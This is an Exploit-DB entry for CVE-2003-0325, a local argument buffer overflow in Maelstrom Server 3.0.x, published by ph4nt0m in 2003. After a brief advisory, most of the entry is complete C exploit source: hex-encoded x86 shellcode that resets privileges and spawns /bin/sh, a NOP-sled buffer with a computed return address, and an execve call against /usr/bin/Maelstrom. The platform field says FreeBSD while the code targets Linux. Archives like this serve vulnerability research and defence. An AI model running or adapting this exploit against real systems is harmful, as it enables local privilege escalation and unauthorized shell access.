Maelstrom Server 3.0.x - Argument Buffer Overflow (2)

EDB-ID:

22614

CVE:

2003-0325

EDB Verified:

Author:

ph4nt0m

Type:

local

Exploit:   /  

Platform:

FreeBSD

Date:

2003-05-23

Vulnerable App: 
// source: https://www.securityfocus.com/bid/7630/info
 
Maelstrom for Linux has been reported prone to a buffer overflow vulnerability.
 
The issue is reportedly due to a lack of sufficient bounds checking performed on user-supplied data before it is copied into an internal memory space. It may be possible for a local attacker to exploit this condition and have malicious arbitrary code executed in the context of the Maelstrom application. Typically setGID games. 

/*  /usr/bin/Maelstrom local exploit
*** Sorry for my poor english.
*** Others exploit can't exploit my Maelstrom,So I
wrote this exploit just for fun.
*** I can't get a rootshell on my linux ,because it's
not SUID.
*** If it SUID ,this exploit can make you get a rootshell.
*** Tested on redhat9.0 ,other linux maybe OK,too.
***
*** Thanks netric's good paper.
*** You can downlocd it here
http://www.netric.org/papers/envpaper.pdf
*** This paper make me write this exploit don't need to
guess ret.
*** Thanks jsk and axis for their help.
***
*** CONTACT:OYXin@ph4nt0m.net
*** COPYRIGHT (c) 2003 PH4NT0M SECURITY
*** http://www.ph4nt0m.net
*** 2003.5.23

Coded by OYXin(ph4nt0m)
Welcome to http://www.ph4nt0m.net

*/
#include<stdio.h>
#include<stdlib.h>
#include<unistd.h>

#define  bufsize 8179

/*  linux x86 shellcode by bob from dtors.net,23
bytes,thx them.  */
static char shellcode[] =



   "\x31\xdb"
    "\x89\xd8"
    "\xb0\x17"
    "\xcd\x80"
    "\x31\xdb"
    "\x89\xd8"
    "\xb0\x17"
    "\xcd\x80"
    "\x31\xdb"
    "\x89\xd8"
    "\xb0\x2e"
    "\xcd\x80"
    "\x31\xc0"
    "\x50"
    "\x68\x2f\x2f\x73\x68"
    "\x68\x2f\x62\x69\x6e"
    "\x89\xe3"
    "\x50"
    "\x53"
    "\x89\xe1"
    "\x31\xd2"
    "\xb0\x0b"
    "\xcd\x80"
     "\x31\xdb"
    "\x89\xd8"
    "\xb0\x01"
    "\xcd\x80";

int main(int argc,char *argv[]){
    char buf[bufsize+1];
    char*prog[]={"/usr/bin/Maelstrom","-server",buf,NULL};
    char  *env[]={"HOME=/root",shellcode,NULL};
    unsigned long ret;


    ret=0xc0000000-sizeof(void*)-strlen(prog[0])-strlen(shellcode)-0x02;

    memset(buf, 0x90, bufsize);
    memset(buf,0x32,sizeof("1"));
    memset(buf+1,0x40,sizeof("1"));
    memcpy(&buf[bufsize-(sizeof(ret))], &ret, sizeof(ret));

    memcpy(&buf[bufsize-(2*sizeof(ret))], &ret,sizeof(ret));

    memcpy(&buf[bufsize-(3*sizeof(ret))], &ret,sizeof(ret));

    memcpy(&buf[bufsize-(4*sizeof(ret))], &ret,sizeof(ret));
    buf[bufsize] = '\0';

    execve(prog[0],prog,env);

    return  0;
}
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services